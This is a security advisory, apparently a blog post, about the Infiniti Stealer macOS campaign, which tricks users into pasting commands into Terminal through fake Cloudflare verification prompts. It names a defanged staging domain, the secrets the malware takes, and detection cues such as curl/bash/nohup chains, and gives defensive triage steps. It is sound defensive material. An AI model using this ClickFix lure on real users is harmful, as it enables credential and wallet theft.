Infiniti Stealer targets macOS users via fake Cloudflare ClickFix prompts

Photo by protect.computer on protect.computer

What happened

Malwarebytes documented a new macOS infostealer campaign it calls Infiniti Stealer. Instead of exploiting a software bug, the attackers use a ClickFix social-engineering flow: victims see a fake “verification” page and are told to paste a command into Terminal.

According to Malwarebytes, the command fetches a staged malware chain from update-check[.]com, then launches a payload compiled with Nuitka (Python-to-native binary packaging), which can make static analysis and detection harder.

The final payload is described as stealing browser credentials, Keychain data, wallet information, and developer secrets (for example .env data), then exfiltrating results to attacker infrastructure.

Why this matters

This attack pattern bypasses many users’ normal safety instincts because it looks like routine bot/human verification. The high risk comes from users executing the command themselves, which can bypass the protections people expect from browser download warnings.

For teams that support macOS endpoints, this is also a reminder that modern infostealer operators are actively targeting Apple systems with delivery techniques that previously spread mostly on Windows.

How to check if you’re affected

Potentially affected systems/services

• Affected devices/models: macOS systems where users pasted unknown commands into Terminal from a website prompt.
• Browsers and credential stores on those devices (including Keychain and Chromium/Firefox profiles).
• Developer workstations with local plaintext secrets (for example .env files).

Concrete verification steps (10–30 minute triage)

1. Interview impacted users immediately

   • Ask whether they executed a verification command in Terminal from a website.
   • Preserve timestamps and visited URL history before cleanup.

2. Hunt for suspicious execution artifacts

   • Review shell history and recent process execution for curl/bash/nohup chains.
   • Check temporary paths and launch-agent persistence locations for unknown files.

3. Assume secret exposure and rotate credentials

   • Reset passwords from a known-clean device.
   • Revoke active sessions, API tokens, and SSH keys that may have been present on the host.

4. Scan and isolate affected endpoints

   • Run endpoint scans and isolate hosts with suspicious findings.
   • If confidence is low, perform full rebuild/re-enrollment of affected systems.

5. Block known campaign infrastructure and educate users

   • Block update-check[.]com and related indicators from the Malwarebytes report.
   • Reinforce policy: legitimate CAPTCHA flows never require pasting commands into Terminal.

Immediate defensive actions

• Send an org-wide warning about fake ClickFix/CAPTCHA Terminal prompts.
• Prioritize credential rotation for any user who executed unknown shell commands.
• Add detections for suspicious Terminal-based bootstrap chains on macOS.

Sources

• https://www.malwarebytes.com/blog/threat-intel/2026/03/infiniti-stealer-a-new-macos-infostealer-using-clickfix-and-python-nuitka
• https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/

Bottom line

If a user pasted a website-provided command into Terminal, treat the Mac as potentially compromised, rotate exposed secrets, and investigate quickly. ClickFix-style social engineering is now a practical, repeatable macOS infection path.